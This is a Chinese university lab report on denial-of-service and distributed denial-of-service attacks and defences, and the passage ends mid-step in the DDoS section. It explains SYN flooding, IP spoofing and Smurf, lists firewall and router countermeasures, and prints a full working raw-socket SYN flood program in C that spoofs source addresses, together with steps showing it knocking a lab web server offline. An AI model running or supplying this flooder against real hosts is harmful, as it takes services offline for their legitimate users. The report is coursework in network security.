实验10拒绝服务攻击与防范.docx
《实验10拒绝服务攻击与防范.docx》由会员分享,可在线阅读,更多相关《实验10拒绝服务攻击与防范.docx(21页珍藏版)》请在冰豆网上搜索。
实验10拒绝服务攻击与防范
贵州大学实验报告
学院:
计算机科学与技术学院专业:
信息安全班级:
姓名
学号
实验组
实验时间
2015.06.17
指导教师
蒋朝惠
成绩
实验项目名称
实验十拒绝服务攻击与防范
实验目的
(一)拒绝服务(DoS)攻击与防范
通过本实验的学习,使大家了解拒绝服务攻击的原理以及相应的防范方法。
通过一个SYNFlood的拒绝服务程序,使大家加强对Dos攻击的理解。
(二)分布式服务(DDoS)攻击与防范
通过本实验的学习,使大家了解分布式拒绝服务(DDoS)攻击的原理以及相应的防范方法。
实验要求
通过实验,理解和掌握DoS和DDoS的攻击原理以及相应的防范方法
实验原理
(一)拒绝服务(DoS)攻击与防范
1.TCP协议介绍
传输控制协议是用来在不可靠的Internet上提供可靠的、端到端的字节流通信协议,在FRC793中有正式定义,还有一些解决错误的方案在RFC1122中有记录,RFC1323则有TCP的功能扩展。
常见到的TCP/IP协议中,IP层不保证将数据报正确传输到目的地TCP则从本地机器接收用户的数据流,将其分成不超过64KB的数据字段,将每个数据片段作为单独的IP数据包发送出去,最后在目的地机器中将其再组合成完整的字节流,TCP协议必须保证可靠性。
发送方和接收方的TCP传输以数据段的形式交换数据,i一个数据段包括固定20字节,加上可选部分,后面再加上数据。
TCP协议从发送方传输一个数据耳朵时候,其中有一个确认号,它等于希望收到的下一个数据段的序号,接收方还要发送回一个数据段,其中有一个确认号,它等于希望收到的下一个数据段的顺序号。
如果计时器在确认信息到达以前超时了,发送方会重新发送这个数据段。
从上面的内容可以在总体上了解一点TCP,重要的是熟悉TCP的数据头。
因为数据流的传输最重要的就是header里面的东西,至于发送的数据,只是TCP数据头附带上的、客户端和服务器端的服务响应就是痛header里面的数据有关,两端信息交流和交换是根据header中内容实施的,因此,要了解DoS攻击原理,就必须对TCP的header中的内容非常熟悉。
有关TCP数据段头格式参见7.1.3节内容。
TCP连接采用“3次握手”,其原理步骤如下所述。
在没有连接时,接受方服务器处于监听状态,等待其它机器发送连接请求。
第一步,客户端发送一个带SYN位的请求,向服务器表示需要连接。
第二步,服务器接收到这样的请求后,查看监听的端口是否为指定端口,如果不是,则发送RST=1应答,拒绝建立连接。
如果是,那么服务器发送确认,SYN为服务器的一个内码,假设为100,ACK位则为客户端的请求序号加1,本例中发送的数据是:
SYN=11,ACK=100,用这样的数据发送给客户端。
向客户端标明,服务器连接已准备好,等待客户端的确认。
这时客户端接收到信息后,分析得到的信息,准备发送确认连接信号到服务器。
第三步,客户端发送确认信息建立连接的消息给服务器端,确认信息的SYN位是服务器发送的ACK位,ACK位是服务器发送的SYN位加1.级:
SYN=11,ACK=101。
这时,连接已经建立好了,可以进行发送数据的过程。
服务器不会在每次接收到SYN请求就立刻恢复客户端建立连接,而是为连接请求分配内存空间,建立会话,并放到一个队列中。
如果等待队列已经满了,那么服务器就不会再为新的连接分配资源,直接丢弃请求。
如果到了这种地步,那么服务器就是拒绝服务了。
2.拒绝服务(DoS)攻击
(1)DoS的基本概念
DoS的英文全称是denialofservice,也就是“拒绝服务”的意思。
从网络攻击的各种方法和所产生的破坏情况来看,DOS算是一种很简单但又很有效的攻击方式。
它的目的就是拒绝服务访问,破坏服务程序正常运行,最终它会使部分Internet连接和网络系统失效。
DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的资源,从而使合法用户无法得到服务。
DoS攻击的基本过程是:
攻击者向服务器发送众多的带有虚假地址请求,服务器发送回复请求后等待回传信息,由于地址是伪造的,所以服务器一直等不到回传的消息,分配给这次请求的资源就始终没被释放。
当服务器等待一段时间后,连接会因超时而呗切断,攻击者会再传送一批新的请求,在这种反复发送伪地址请求的情况下,服务器资源会最终被耗尽。
被DOS攻击事的现象大致有:
①被攻击主机上有大量等待的TCP连接。
②被攻击主机的系统资源被大量占用,造成系统停顿。
③网络充斥着大量无用的数据包,源地址为伪造地址。
④大量无用数据使得网络拥塞,受害主机无法与外界进行通信。
⑤利用受害主机提供的服务或传输协议上的缺陷,反复高速地发送特定的服务请求,使受害主机无法及时处理所有正常请求,严重时会造成系统崩溃。
(2)拒绝服务攻击的基本方法
要对服务器实现拒绝服务攻击,实质上有两种方式:
一是迫使服务器的缓冲区满,不接受新的请求;二是使用IP欺骗,迫使服务器把合法的连接复位,影响合法用户的连接。
这就是DoS攻击实施的基本思想。
具体实现有一下几种方法:
①SNYFlood。
编写发包程序,设置TCP的Header,向服务器端不断成倍地发送只有SYN标志的TCP请求。
当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲队列中。
如果SYN请求超过了服务器能容纳的限度,缓冲区队列占满,那么服务器就不再接收新请求了,其他合法用户的连接都被拒绝掉。
②IP欺骗DoS攻击。
这种攻击利用RST位来实现。
假设现在只有有一个合法用户(1.1.1.1)已经同服务器建立了正常的连接,攻击者构造攻击的TCP数据,伪装自己的IP为1.1.1.1,并向服务器发送一个带有RST位的TCP数据段。
服务器接收到这样的数据后。
认为从1.1.1.1发送的连接错误,就会清空缓冲区中建好的连接。
这时。
如果合法用户1.1.1.1再发送合法数据;服务器就已经没有这样的连接了,该用户就必须重新开始建立连接。
使用这种攻击方式时,需要伪造大量的IP地址,向目标发送RST数据,可以使服务器不对合法用户服务。
③Smurf。
广播信息可以通过一定的手段发送到整个网络机器中。
当某台机器使用广播地址发送一个ICMPecho请求包时,一些系统会回应一个ICMPecho回应包。
④自身消耗的DoS攻击。
这种DoS攻击就是把请求数据包中的客户端IP和端口设置成主机自己IP和端口,再发送给主机,使得主机给自己发送TCP相应和连接。
这样,主机就会很快把资源耗光,直接导致死机。
这种伪装攻击对一些身份认证系统威胁巨大。
⑤塞满服务器的硬盘。
通常,如果服务器可以没有限制地执行写操作;那么通过一些手段就可以造成硬盘被写满,从而拒绝服务;比如发送垃圾邮件。
⑥合理利用策略。
一般服务器都有关于账户锁定的安全策略,比如某个账户连续3次登陆失败,那么这个账号将被锁定。
这点也可以被破坏者利用,他们伪装一个账号去错误登陆,这样使得这个账号被锁定,而正常的合法用户就不能使用账号去登陆系统了。
(3)拒绝服务攻击的防范
到目前为止,防范DoS特别是DDoS攻击仍比较困难。
但仍然可以采取一些措施以降低其产生的危害。
对中小型网站来说,可以从以下几个方面进行防范:
①主机设置。
即加固操作系统,对各操作系统参数进行设置以加强系统稳固性。
重新编译或设置Linux以及操作各种BSD系统、Solaris等操作系统内核中某些参数,可在一定程度上提高系统的抗攻击能力。
例如,对于DoS攻击的典型种类——SYNFlood,它利用TCP/IP漏洞发送大量伪造的TCP连接请求,以造成网络无法连接用户服务或使操作系统瘫痪。
该攻击过程涉及系统的一下参数:
可等待的数据包的链接数和超时等待数据包的时间长度。
因此,则进行如下设置:
●关闭不必要的服务。
●将数据包的链接数从默认值128或512改为2048或更大,以家常每次处理数据包队列的长度;以缓解和消化更多数据包的连接。
●将连接超时时间设置得较短,以保证正常数据包的连接,屏蔽非法攻击包。
●及时更新系统、安装补丁。
②防火墙设置。
仍以SYNFlood为例,可以在在防火墙上进行如下设置:
●禁止对主机非开放服务的访问。
●限制同时打开的数据包最大连接数。
●限制特定IP地址的访问。
●启用防火墙的防DDoS的属性。
●严格限制对外开放服务器的向外访问,以防止自己服务器被当作工具攻击他人。
●RandomDrop算法。
当流量达到一定阀值时,按照算法规则丢弃后续报文,以保持主机的处理能力。
其不足是会误丢正常的数据包,特别是在大流量数据包的攻击下,正常数据包容易随非法数据包被拒之网外。
●SYNCookie算法。
采用“六次握手”技术以降低受攻击率。
其不足是依据列表查询,当数据流量增大时,列表急剧膨胀,计算量随之提升,容易造成响应延迟乃至系统瘫痪。
③路由器设置。
以CISCO路由器为例,可采取如下方法。
●CiscoExpressForwarding(CEF)。
●使用Unicasatreverse-path。
●访问控制列表(ACL)过滤。
●设置数据流量速率。
●升级版本过低的IOS。
●为路由器建立logserver。
不论防火墙还是路由器都是到外界的接口设备,在进行防DDoS设置的同时,要权衡可能牺牲的正常业务代价,谨慎行事。
④利用负载均衡技术。
就是把应用业务分部到几台不同的服务器上。
采用循环DNS服务或者硬件路由器技术,将进入系统的请求分流到多台服务器上。
这种方法要求投资较大,相应的维护费也高,中型网站如果有条件可以考虑。
以上方法对流量小、正对性强、结构简单的DoS攻击进行防范还是很有效的。
而对于DDoS攻击,则需要能够应付大流量的防范措施和技术,需要能够综合多种算法、集多种网络设备功能的集成技术。
(二)分布式服务(DDoS)攻击与防范
1.DDoS的基本概念
分布式拒绝服务攻击时借助于客户——服务器技术,将多个计算机联合起来作为攻击平台,对一个活活在多个目标发动攻击,使成倍的增加攻击能力。
2.DDoS的攻击原理
(1)Smurf与Fraggle
将一个目的地址设置成广播地址后,它就会被网络中的所有主机接收并处理。
其中Smurf是用广播地址发送ICMPECHO包,而Fraggle是用广播地址发送UDP包。
(2)trinoo
是复杂的DDoS攻击程序,它使用主控程序master对实际实施攻击的任何数量的“代理”程序实现自动控制。
(3)TFN2K
是一个使用master程序与位于多个网络上的哦国内国际代理进行通信。
(4)Stacheldraht
也是基于TFN的,采用C/S模式,其中master程序与潜在的成千上万个代理程序进行通信。
3.DDoS系统的一般结构
在更一般的情况下,DDoS可能使用多台控制机,形成一个攻击结构。
4.DDoS的监测
(1)根据异常情况分析
(2)使用DDoS检测工具
5.DDoS攻击的防御策略
实验仪器
(一)拒绝服务(DoS)攻击与防范
1.安装有Windows操作系统的PC,编辑工具可选用VC++6.0。
2.由hub或交换机组成的有若干台PC局域网。
(二)分布式服务(DDoS)攻击与防范
Windowsserver2003,风云压力测试DDoS软件,冰盾防火墙
实验步骤、内容、数据
(一)拒绝服务(DoS)攻击与防范
1.在一个局域网环境中,根据实验内容中提供的DoS程序,编写一个SYNFlood拒绝服务程序。
使用自己编写的DoS程序攻击实验室的一台实验主机,在实验主机上安装一个网络监听工具(如tcpdump等),观测DoS攻击效果。
2.交自己编辑的SYNFlood拒绝服务攻击程序猿代码,并对代码中的关键步骤添加注释,通过网络监听工具观测攻击效果,并对实验结果进行分析。
3.SYNFlood程序如下:
#include
#include
#include
#include
#include
#include
#pragmacomment(lib,"ws2_32.lib")
#defineMAX_RECEIVEBYTE255
typedefstructip_head//定义IP首部
{
unsignedcharh_verlen;//4位首部长度,4位IP版本号
unsignedchartos;//8位服务类型TOS
unsignedshorttotal_len;//16位总长度(字节)
unsignedshortident;//16位标识
unsignedshortfrag_and_flags;//3位标志位(如SYN,ACK,等)
unsignedcharttl;//8位生存时间TTL
unsignedcharproto;//8位协议(如ICMP,TCP等)
unsignedshortchecksum;//16位IP首部校验和
unsignedintsourceIP;//32位源IP地址
unsignedintdestIP;//32位目的IP地址
}IPHEADER;
typedefstructtcp_head//定义TCP首部
{
USHORTth_sport;//16位源端口
USHORTth_dport;//16位目的端口
unsignedintth_seq;//32位序列号
unsignedintth_ack;//32位确认号
unsignedcharth_lenres;//4位首部长度/6位保留字
unsignedcharth_flag;//6位标志位
USHORTth_win;//16位窗口大小
USHORTth_sum;//16位校验和
USHORTth_urp;//16位紧急数据偏移量
}TCPHEADER;
typedefstructtsd_head//定义TCP伪首部
{
unsignedlongsaddr;//源地址
unsignedlongdaddr;//目的地址
charmbz;
charptcl;//协议类型
unsignedshorttcpl;//TCP长度
}PSDHEADER;
//CheckSum:
计算校验和的子函数
USHORTchecksum(USHORT*buffer,intsize)
{
unsignedlongcksum=0;
while(size>1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if(size)
{
cksum+=*(UCHAR*)buffer;
}
cksum=(cksum>>16)+(cksum&0xffff);
cksum+=(cksum>>16);
return(USHORT)(~cksum);
}
voidusage()
{
printf("***********************************************************");
printf("SYN_FLOODMADEBYLionD8");
printf("Useage:
FLOODTarget_ipTarget_portDelay_time");
printf("***********************************************************");
}
//Delay_time单位为毫秒。
intmain(intargc,char*argv[])
{
WSADATAWSAData;
SOCKETsock;
SOCKADDR_INaddr_in;
IPHEADERipHeader;
TCPHEADERtcpHeader;
PSDHEADERpsdHeader;
intSourcePort;
charszSendBuf[60]={0};
BOOLflag;
intrect,nTimeOver;
intsleeptime;
usage();
if(argc<3||argc>4)
{printf("inputerror!
");
returnfalse;}
if(argc==4)sleeptime=atoi(argv[3]);
elsesleeptime=300;
if(WSAStartup(MAKEWORD(2,2),&WSAData)!
=0)
{
printf("WSAStartupError!
");
returnfalse;
}
sock=NULL;
if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("SocketSetupError!
");
returnfalse;
}
flag=true;
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockoptIP_HDRINCLerror!
");
returnfalse;
}
nTimeOver=1000;
if(setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&nTimeOver,sizeof(nTimeOver))==SOCKET_ERROR)//设置发送的时间
{
printf("setsockoptSO_SNDTIMEOerror!
");
returnfalse;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(atoi(argv[2]));
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
while(TRUE)
{
//填充IP首部
ipHeader.h_verlen=(4<<4|sizeof(ipHeader)/sizeof(unsignedlong));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));//IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;//无分片
ipHeader.ttl=(unsignedchar)GetTickCount()%87+123;
ipHeader.proto=IPPROTO_TCP;//协议类型为TCP
ipHeader.checksum=0;//效验位先初始为0
ipHeader.sourceIP=htonl(GetTickCount()*474695);//随机产生一个伪造的IP
ipHeader.destIP=inet_addr(argv[1]);//目标IP
//填充TCP首部
SourcePort=GetTickCount()*43557%9898;//随机产生一个端口号
tcpHeader.th_dport=htons(atoi(argv[2]));//发送的目的端口
tcpHeader.th_sport=htons(SourcePort);//源端口号
tcpHeader.th_seq=htonl(0x12345678);//序列号
tcpHeader.th_ack=0;//确认号
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2;//为SYN请求
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_sum=0;
//填充TCP伪首部用来计算TCP头部的效验和
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
//计算校验和
memcpy(szSendBuf,&psdHeader,sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader),&tcpHeader,sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
//把伪造好的IP头和TCP头放进buf准备发送
memcpy(szSendBuf,&ipHeader,sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader),&tcpHeader,sizeof(tcpHeader));
//发送数据包
rect=sendto(sock,szSendBuf,sizeof(ipHeader)+sizeof(tcpHeader),0,(structsockaddr*)&addr_in,sizeof(addr_in));
if(rect==SOCKET_ERROR)
{
printf("senderror!
:
%x",WSAGetLastError());
returnfalse;
}
else
printf("sendok!
");
Sleep(sleeptime);//根据自己网速的快慢确定此值,sleeptime越小发得越快
}//endwhile//重新伪造IP的源地址等再次向目标发送
closesocket(sock);
WSACleanup();
return0;
}
4.运行代码得到如下可执行文件:
5.攻击之前,将一台web服务器的服务端口改为1234,如下:
6.访问上面的web服务器如下:
7.DoS攻击:
8.最后一个参数60,表示每60ms发送一次,回车后:
9.每60ms显示一个sendok!
表示发送成功。
DoS攻击之后,访问之前的web服务器,出现如下情况:
表明DOS攻击成功!
(二)分布式服务(DDoS)攻击与防范
C1(攻击者)上安装DDoS客户端程序,C2—C6(傀儡机)上安装DDoS服务器端,C7(被攻击者)上安装启用冰盾DDoS防火墙,C8(被攻击者)上不使用防火墙。
1.C1下载风云压力测试软件,解压后可看见目录下有一生成器文件
2.单击【生成版本